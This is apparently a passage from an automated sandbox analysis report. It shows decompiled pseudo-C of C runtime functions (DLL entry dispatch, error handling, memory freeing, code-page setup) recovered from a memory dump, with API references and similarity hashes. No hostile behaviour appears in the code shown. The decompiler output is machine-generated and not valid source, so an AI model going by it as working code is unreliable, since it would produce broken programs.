                                                                                                                                                                                                                                					 *0x736ef120 = _t34 - 1;
                                                                                                                                                                                                                                					 *(_t82 - 0x1c) = 1;
                                                                                                                                                                                                                                					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                                                                                                                                                                                                                                					 *((char*)(_t82 - 0x20)) = E736D7453();
                                                                                                                                                                                                                                					 *(_t82 - 4) = 1;
                                                                                                                                                                                                                                					__eflags =  *0x736ef460 - 2;
                                                                                                                                                                                                                                					if( *0x736ef460 != 2) {
                                                                                                                                                                                                                                						E736D76ED(_t68, 1, __esi, 7);
                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                						_push(0xc);
                                                                                                                                                                                                                                						_push(0x736e9a30);
                                                                                                                                                                                                                                						E736D7870(__ebx, 1, __esi);
                                                                                                                                                                                                                                						_t72 =  *(_t82 + 0xc);
                                                                                                                                                                                                                                						__eflags = _t72;
                                                                                                                                                                                                                                						if(_t72 != 0) {
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                                                                                                                                                                                                                                							__eflags = _t72 - 1;
                                                                                                                                                                                                                                							if(_t72 == 1) {
                                                                                                                                                                                                                                								L12:
                                                                                                                                                                                                                                								_t58 =  *(_t82 + 0x10);
                                                                                                                                                                                                                                								_t76 = E736D71C6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                                                                                                                                                                                                                                								 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                								__eflags = _t76;
                                                                                                                                                                                                                                								if(_t76 != 0) {
                                                                                                                                                                                                                                									_t41 = E736D6EB1(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
                                                                                                                                                                                                                                									_t76 = _t41;
                                                                                                                                                                                                                                									 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                									__eflags = _t76;
                                                                                                                                                                                                                                									if(_t76 != 0) {
                                                                                                                                                                                                                                										goto L14;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								__eflags = _t72 - 2;
                                                                                                                                                                                                                                								if(_t72 == 2) {
                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t58 =  *(_t82 + 0x10);
                                                                                                                                                                                                                                									L14:
                                                                                                                                                                                                                                									_push(_t58);
                                                                                                                                                                                                                                									_t76 = E736D6490( *((intOrPtr*)(_t82 + 8)), _t72);
                                                                                                                                                                                                                                									 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                									__eflags = _t72 - 1;
                                                                                                                                                                                                                                									if(_t72 == 1) {
                                                                                                                                                                                                                                										__eflags = _t76;
                                                                                                                                                                                                                                										if(_t76 == 0) {
                                                                                                                                                                                                                                											_push(_t58);
                                                                                                                                                                                                                                											_t45 = E736D6490( *((intOrPtr*)(_t82 + 8)), _t42);
                                                                                                                                                                                                                                											__eflags = _t58;
                                                                                                                                                                                                                                											_t25 = _t58 != 0;
                                                                                                                                                                                                                                											__eflags = _t25;
                                                                                                                                                                                                                                											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
                                                                                                                                                                                                                                											E736D700B(_t58, _t68, _t72, _t76, _t25);
                                                                                                                                                                                                                                											_pop(_t61);
                                                                                                                                                                                                                                											E736D71C6( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									__eflags = _t72;
                                                                                                                                                                                                                                									if(_t72 == 0) {
                                                                                                                                                                                                                                										L19:
                                                                                                                                                                                                                                										_t76 = E736D6EB1(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                                                                                                                                                                                                                                										 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                										__eflags = _t76;
                                                                                                                                                                                                                                										if(_t76 != 0) {
                                                                                                                                                                                                                                											_t76 = E736D71C6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                                                                                                                                                                                                                                											 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										__eflags = _t72 - 3;
                                                                                                                                                                                                                                										if(_t72 == 3) {
                                                                                                                                                                                                                                											goto L19;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *(_t82 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                							_t40 = _t76;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							__eflags =  *0x736ef120 - _t72; // 0x1
                                                                                                                                                                                                                                							if(__eflags > 0) {
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t40 = 0;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
                                                                                                                                                                                                                                						return _t40;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						E736D751E(__ebx, _t61, 1, __esi);
                                                                                                                                                                                                                                						E736D73DA();
                                                                                                                                                                                                                                						E736D783C();
                                                                                                                                                                                                                                						 *0x736ef460 =  *0x736ef460 & 0x00000000;
                                                                                                                                                                                                                                						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                                                                                                                                                                                                                                						E736D70A0();
                                                                                                                                                                                                                                						_t54 = E736D76BF( *((intOrPtr*)(_t82 + 8)), 0);
                                                                                                                                                                                                                                						asm("sbb esi, esi");
                                                                                                                                                                                                                                						_t80 =  ~(_t54 & 0x000000ff) & 1;
                                                                                                                                                                                                                                						__eflags = _t80;
                                                                                                                                                                                                                                						 *(_t82 - 0x1c) = _t80;
                                                                                                                                                                                                                                						 *(_t82 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                						E736D70AD();
                                                                                                                                                                                                                                						_t56 = _t80;
                                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t56 = 0;
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
                                                                                                                                                                                                                                					return _t56;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}
















APIs
• __RTC_Initialize.LIBCMT ref: 736D7052
• ___scrt_uninitialize_crt.LIBCMT ref: 736D706C
Memory Dump Source
• Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
• Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
• Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
• Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
• Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
• Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
Similarity
• API ID: Initialize___scrt_uninitialize_crt
• String ID:
• API String ID: 2442719207-0
• Opcode ID: 378f9ec891cc592fe05c5191dc0a74970a159cee05a007276f240fe1bbc59bd0
• Instruction ID: 86c9b1130994403542d4f57d1ba38c5bb9deead51921a4127dfe88e3e65fea96
• Opcode Fuzzy Hash: 378f9ec891cc592fe05c5191dc0a74970a159cee05a007276f240fe1bbc59bd0
• Instruction Fuzzy Hash: E641C472E21718AFEF119F69DD00FAE7FB5EF84690F15421AE815572C4D7308D018BA6
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			E736D70BB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				signed int _t42;
                                                                                                                                                                                                                                				signed int _t45;
                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t40 = __edx;
                                                                                                                                                                                                                                				_push(0xc);
                                                                                                                                                                                                                                				_push(0x736e9a30);
                                                                                                                                                                                                                                				E736D7870(__ebx, __edi, __esi);
                                                                                                                                                                                                                                				_t42 =  *(_t47 + 0xc);
                                                                                                                                                                                                                                				if(_t42 != 0) {
                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                                                                                                                                                                                                                                					__eflags = _t42 - 1;
                                                                                                                                                                                                                                					if(_t42 == 1) {
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						_t35 =  *(_t47 + 0x10);
                                                                                                                                                                                                                                						_t45 = E736D71C6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
                                                                                                                                                                                                                                						 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                						__eflags = _t45;
                                                                                                                                                                                                                                						if(_t45 == 0) {
                                                                                                                                                                                                                                							L16:
                                                                                                                                                                                                                                							 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                							_t24 = _t45;
                                                                                                                                                                                                                                							L17:
                                                                                                                                                                                                                                							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
                                                                                                                                                                                                                                							return _t24;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t25 = E736D6EB1(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
                                                                                                                                                                                                                                						_t45 = _t25;
                                                                                                                                                                                                                                						 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                						__eflags = _t45;
                                                                                                                                                                                                                                						if(_t45 == 0) {
                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                						_push(_t35);
                                                                                                                                                                                                                                						_t45 = E736D6490( *((intOrPtr*)(_t47 + 8)), _t42);
                                                                                                                                                                                                                                						 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                						__eflags = _t42 - 1;
                                                                                                                                                                                                                                						if(_t42 == 1) {
                                                                                                                                                                                                                                							__eflags = _t45;
                                                                                                                                                                                                                                							if(_t45 == 0) {
                                                                                                                                                                                                                                								_push(_t35);
                                                                                                                                                                                                                                								_t29 = E736D6490( *((intOrPtr*)(_t47 + 8)), _t26);
                                                                                                                                                                                                                                								__eflags = _t35;
                                                                                                                                                                                                                                								_t14 = _t35 != 0;
                                                                                                                                                                                                                                								__eflags = _t14;
                                                                                                                                                                                                                                								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
                                                                                                                                                                                                                                								E736D700B(_t35, _t40, _t42, _t45, _t14);
                                                                                                                                                                                                                                								_pop(_t37);
                                                                                                                                                                                                                                								E736D71C6( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__eflags = _t42;
                                                                                                                                                                                                                                						if(_t42 == 0) {
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							_t45 = E736D6EB1(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
                                                                                                                                                                                                                                							 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                							__eflags = _t45;
                                                                                                                                                                                                                                							if(_t45 != 0) {
                                                                                                                                                                                                                                								_t45 = E736D71C6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
                                                                                                                                                                                                                                								 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							__eflags = _t42 - 3;
                                                                                                                                                                                                                                							if(_t42 != 3) {
                                                                                                                                                                                                                                								goto L16;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					__eflags = _t42 - 2;
                                                                                                                                                                                                                                					if(_t42 == 2) {
                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t35 =  *(_t47 + 0x10);
                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t52 =  *0x736ef120 - _t42; // 0x1
                                                                                                                                                                                                                                				if(_t52 > 0) {
                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t24 = 0;
                                                                                                                                                                                                                                				goto L17;
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                0x736d71b9
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d710f
                                                                                                                                                                                                                                0x736d7114
                                                                                                                                                                                                                                0x736d7116
                                                                                                                                                                                                                                0x736d7119
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d712b
                                                                                                                                                                                                                                0x736d712d
                                                                                                                                                                                                                                0x736d7130
                                                                                                                                                                                                                                0x736d7133
                                                                                                                                                                                                                                0x736d7135
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d7139
                                                                                                                                                                                                                                0x736d713e
                                                                                                                                                                                                                                0x736d7143
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d714b
                                                                                                                                                                                                                                0x736d714c
                                                                                                                                                                                                                                0x736d7151
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d715c
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d7165
                                                                                                                                                                                                                                0x736d716f
                                                                                                                                                                                                                                0x736d7171
                                                                                                                                                                                                                                0x736d7174
                                                                                                                                                                                                                                0x736d7176
                                                                                                                                                                                                                                0x736d7182
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3136044242-0
                                                                                                                                                                                                                                • Opcode ID: f69d82640cb2618b1f393baf875ff620fb233056fe885475575e5e21c5e0934b
                                                                                                                                                                                                                                • Instruction ID: 5a2ad8b875ffc1c13fee5f14ed6d5ee3781db45e6ff914c0eecdffea6052697a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f69d82640cb2618b1f393baf875ff620fb233056fe885475575e5e21c5e0934b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A216D72D21625AFEF228E55CD40F6F7F79EB80A90F094629E816562D4D6308D028BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D9DEA(void* __ecx) {
                                                                                                                                                                                                                                				intOrPtr _t2;
                                                                                                                                                                                                                                				signed int _t3;
                                                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                				signed int _t18;
                                                                                                                                                                                                                                				long _t21;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t21 = GetLastError();
                                                                                                                                                                                                                                				_t2 =  *0x736eb050; // 0x7
                                                                                                                                                                                                                                				_t24 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					_t3 = E736DBC10(__eflags, _t2, 0xffffffff);
                                                                                                                                                                                                                                					__eflags = _t3;
                                                                                                                                                                                                                                					if(_t3 == 0) {
                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t5 = E736DA236(1, 0x364); // executed
                                                                                                                                                                                                                                						_t18 = _t5;
                                                                                                                                                                                                                                						__eflags = _t18;
                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                							__eflags = E736DBC10(__eflags,  *0x736eb050, _t18);
                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                								E736D9A91(_t18, 0x736efafc);
                                                                                                                                                                                                                                								E736DA293(0);
                                                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t13 = 0;
                                                                                                                                                                                                                                								E736DBC10(__eflags,  *0x736eb050, 0);
                                                                                                                                                                                                                                								_push(_t18);
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t13 = 0;
                                                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                                                							E736DBC10(0,  *0x736eb050, 0);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							E736DA293();
                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t18 = E736DBBD1(_t24, _t2);
                                                                                                                                                                                                                                					if(_t18 == 0) {
                                                                                                                                                                                                                                						_t2 =  *0x736eb050; // 0x7
                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t18 != 0xffffffff) {
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							_t13 = _t18;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							L3:
                                                                                                                                                                                                                                							_t13 = 0;
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							_t18 = _t13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				SetLastError(_t21);
                                                                                                                                                                                                                                				asm("sbb edi, edi");
                                                                                                                                                                                                                                				return  ~_t18 & _t13;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736D9DEF
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9E4C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9E82
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736D9E8D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2283115069-0
                                                                                                                                                                                                                                • Opcode ID: 2114873e75f4510dcb69ee662b3dc4e80ac427be31634503da50bf18635ef86d
                                                                                                                                                                                                                                • Instruction ID: a3292ceadf456f39e1371fda9e56ad2405294d444ba4aefc0b9fc455f3a4df56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2114873e75f4510dcb69ee662b3dc4e80ac427be31634503da50bf18635ef86d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A11C6336693053BEF0222A78D84F1B22A9BFC2671B280328F129971C5FE618C154128
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                			E736DB00D(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
                                                                                                                                                                                                                                				void* _v5;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char* _v20;
                                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                				char _t39;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				char _t48;
                                                                                                                                                                                                                                				char _t51;
                                                                                                                                                                                                                                				char _t58;
                                                                                                                                                                                                                                				signed int _t64;
                                                                                                                                                                                                                                				void* _t76;
                                                                                                                                                                                                                                				void* _t81;
                                                                                                                                                                                                                                				signed int _t86;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t79 = __edx;
                                                                                                                                                                                                                                				_push(_a16);
                                                                                                                                                                                                                                				_push(_a12);
                                                                                                                                                                                                                                				E736DB128(__ebx, __ecx, __edx, __edi, __esi, __eflags);
                                                                                                                                                                                                                                				_t39 = E736DADB2(__eflags, _a4);
                                                                                                                                                                                                                                				_v16 = _t39;
                                                                                                                                                                                                                                				if(_t39 ==  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_push(__ebx);
                                                                                                                                                                                                                                				_push(__esi);
                                                                                                                                                                                                                                				_push(__edi);
                                                                                                                                                                                                                                				_t40 = E736DC5DF(0x220); // executed
                                                                                                                                                                                                                                				_t81 = _t40;
                                                                                                                                                                                                                                				_t64 = __ebx | 0xffffffff;
                                                                                                                                                                                                                                				__eflags = _t81;
                                                                                                                                                                                                                                				if(__eflags == 0) {
                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                					_t86 = _t64;
                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t81 = memcpy(_t81,  *(_a12 + 0x48), 0x88 << 2);
                                                                                                                                                                                                                                					 *_t81 =  *_t81 & 0x00000000;
                                                                                                                                                                                                                                					_t86 = E736DB219(_t79, __eflags, _v16, _t81);
                                                                                                                                                                                                                                					__eflags = _t86 - _t64;
                                                                                                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                                                                                                						__eflags = _a8;
                                                                                                                                                                                                                                						if(_a8 == 0) {
                                                                                                                                                                                                                                							E736DC870();
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						asm("lock xadd [eax], ebx");
                                                                                                                                                                                                                                						_t66 = _t64 == 1;
                                                                                                                                                                                                                                						__eflags = _t64 == 1;
                                                                                                                                                                                                                                						if(_t64 == 1) {
                                                                                                                                                                                                                                							_t58 = _a12;
                                                                                                                                                                                                                                							__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x736eb060;
                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t58 + 0x48)) != 0x736eb060) {
                                                                                                                                                                                                                                								E736DA293( *((intOrPtr*)(_t58 + 0x48)));
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_t81 = 1;
                                                                                                                                                                                                                                						_t76 = _t81;
                                                                                                                                                                                                                                						_t81 = 0;
                                                                                                                                                                                                                                						 *(_a12 + 0x48) = _t76;
                                                                                                                                                                                                                                						_t48 = _a12;
                                                                                                                                                                                                                                						__eflags =  *(_t48 + 0x350) & 0x00000002;
                                                                                                                                                                                                                                						if(( *(_t48 + 0x350) & 0x00000002) == 0) {
                                                                                                                                                                                                                                							__eflags =  *0x736eb6f0 & 0x00000001;
                                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                                								_v24 =  &_a12;
                                                                                                                                                                                                                                								_v20 =  &_a16;
                                                                                                                                                                                                                                								_t51 = 5;
                                                                                                                                                                                                                                								_v16 = _t51;
                                                                                                                                                                                                                                								_v12 = _t51;
                                                                                                                                                                                                                                								_push( &_v16);
                                                                                                                                                                                                                                								_push( &_v24);
                                                                                                                                                                                                                                								_push( &_v12);
                                                                                                                                                                                                                                								E736DACAE(_t66, 0, _t86, __eflags);
                                                                                                                                                                                                                                								__eflags = _a8;
                                                                                                                                                                                                                                								if(_a8 != 0) {
                                                                                                                                                                                                                                									 *0x736eb63c =  *_a16;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						E736DA293(_t81);
                                                                                                                                                                                                                                						return _t86;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						 *((intOrPtr*)(E736DA223(__eflags))) = 0x16;
                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DADB2: GetOEMCP.KERNEL32(00000000,736DB028,?,00000001,736DE432,736DE432,00000001,?,?), ref: 736DADDD
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DB085
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DB0BB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: 466c2e69632e5bab425e7790b983c2df2aa5c3f3588fc8f0b1ecae84679c51a1
                                                                                                                                                                                                                                • Instruction ID: b88eef880e8eb65c59fb36a4c5241975a3c2521aeaa554663a6a0ddaa5fec635
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 466c2e69632e5bab425e7790b983c2df2aa5c3f3588fc8f0b1ecae84679c51a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F31B072818309AFDF01DF69D840B9E7BB5FF44310F140169E925972D4EB329E50CB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 80%
